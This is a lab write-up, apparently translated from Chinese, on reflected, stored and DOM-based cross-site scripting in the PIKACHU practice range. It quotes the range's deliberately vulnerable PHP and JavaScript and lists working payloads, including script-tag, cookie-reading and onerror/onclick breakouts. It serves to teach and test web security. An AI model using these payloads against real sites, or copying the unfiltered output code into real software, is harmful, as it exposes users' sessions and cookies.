principle

XSS Attack usually refers to the use of Webpage Vulnerabilities left during development , Inject malicious instruction code into the web page through ingenious methods , Allows users to load and execute malicious web programs created by attackers . These malicious web apps are usually JavaScript, But it can also include Java、 VBScript、ActiveX、 Flash Or even ordinary HTML. After a successful attack , An attacker may be given, but not limited to, higher privileges （ If you do something ）、 Private web content 、 Conversation and cookie And so on .

  commonly XSS It can be divided into the following common types ：
  

 1. reflective XSS;
 2. Storage type XSS;
 3.DOM type XSS;

reflective XSS( non-persistent )

reflective XSS Means that the application passes Web Request for untrusted data , And without verifying whether the data has malicious code , Send it to the user . reflective XSS Generally, attackers can construct URL To achieve , In the construction of URL After the address is opened , The malicious code parameters contained therein are parsed and executed by the browser . This attack is characterized by non persistence , It will only be triggered when the user clicks the link containing malicious code parameters .

Here we use PIKACHU For example, the range

GET

Open the web page

First enter KOBE try

  I think it's in message Here is an output point

View source code

$html='';
if(isset($_GET['submit'])){
    if(empty($_GET['message'])){
        $html.="<p class='notice'> Input 'kobe' try -_-</p>";
    }else{
        if($_GET['message']=='kobe'){
            $html.="<p class='notice'> May you and {$_GET['message']} equally , Forever young , Always blood boiling ！</p><img src='{$PIKA_ROOT_DIR}assets/images/nbaplayer/kobe.png' />";
        }else{
            $html.="<p class='notice'>who is {$_GET['message']},i don't care!</p>";
        }
    }
}

There is no filtering of the input string

payload Call directly

<script>alert('H3018')</script>

  It is not possible to input directly from the input box . Because the length here is limited to 20

But we can modify it by ourselves

That's it

POST

  Here is a login page , Directly gave the account password , We log in directly

Here, you can input directly from the input box payload

  It can also be done through bp modify post data

<script>alert('H3018')</script>
 To get COOKIE Words 
<script>alert(document.cookie)</script>

  View source code

$html='';
if(isset($_POST['submit'])){
    if(empty($_POST['message'])){
        $html.="<p class='notice'> Input 'kobe' try -_-</p>";
    }else{

        // Now directly output the parameters input from the front end intact , appear xss
        if($_POST['message']=='kobe'){
            $html.="<p class='notice'> May you and {$_POST['message']} equally , Forever young , Always blood boiling ！</p><img src='{$PIKA_ROOT_DIR}assets/images/nbaplayer/kobe.png' />";
        }else{
            $html.="<p class='notice'>who is {$_POST['message']},i don't care!</p>";
        }
    }
}

There is also no filtering for the incoming string

Storage type XSS

Storage type XSS Also known as persistent XSS, The attack script will be permanently stored in the database or file of the target server , With high concealment

Here we use PIKACHU For example, the range

A message box

Direct input PAYLOAD

<script>alert(document.cookie)</script>

  Just pop up COOKIE

When we click this function interface again , It will also pop up COOKIE

  View source code

$html='';
if(array_key_exists("message",$_POST) && $_POST['message']!=null){
    $message=escape($link, $_POST['message']);
    $query="insert into message(content,time) values('$message',now())";
    $result=execute($link, $query);
    if(mysqli_affected_rows($link)!=1){
        $html.="<p> Database exception , Submit failed ！</p>";
    }
}
<?php echo $html;
$query="select * from message";
$result=execute($link, $query);
while($data=mysqli_fetch_assoc($result)){
echo "<p class='con'>{$data['content']}</p><a href='xss_stored.php?id={$data['id']}'> Delete </a>";}
echo $html;
?>

payload It is directly injected into the local database without any filtering

Every time we visit, we will query the inserted statement , It triggers a pop-up

 DOM type XSS

Document object model （Document Object Model, abbreviation DOM）, yes W3C Handling of organizational recommendations Extensible markup language Standards for Programming interface (API) . It is platform and language independent Application program interface (API), It can dynamically access programs and scripts , Update its content 、 The structure and www The style of the document (HTML and XML The document is defined in the description section ). The document can be further processed , The result of processing can be added to the current page .DOM It's a tree based API file , It requires that the whole document be represented in Memory in . Another simple API It's based on events SAX, It can be used to deal with large XML file , Because of the big , Therefore, it is not suitable to put it all in memory for processing .

javascript You can modify the document object in the tree , And change the elements of the page

 Could trigger DOM type XSS Properties of ：

document.referer attribute 

window.name attribute 

location attribute 

innerHTML attribute 

documen.write attribute 

DOM type XSS

  View source code

if(isset($_GET['text'])){
    $haha = " Here is the background processing logic ";
}
<script>
    function domxss(){
    var str = document.getElementById("text").value;
    document.getElementById("dom").innerHTML = "<a href='"+str+"'>what do you see?</a>";
                    }
</script>

  There is no filtering of the input string , Let's just close it

payload:

'><a href=javascript:alert('H3018') //
' onclick="alert('H3018')"> //
'><img src=x onerror="alert('H3018')"> //

DOM type xss-x

  View source code

if(isset($_GET['text'])){
    $html.= "<a href='#' onclick='domxss()'> Some things you try hard to forget , Then I really forgot </a>";
}
    function domxss(){
                        var str = window.location.search;
                        var txss = decodeURIComponent(str.split("text=")[1]);
                        var xss = txss.replace(/\+/g,' ');                       
                        document.getElementById("dom").innerHTML = "<a href='"+xss+"'> Let the past go with the wind , Let's go with the wind </a>";
                    }
                </script>

Just close it ,payload equally

'><a href=javascript:alert('H3018') //
' onclick="alert('H3018')"> //
'><img src=x onerror="alert('H3018')"> //

Way of defense

Filter the input , Code the output .HttpOnly , Turn on Web Safety head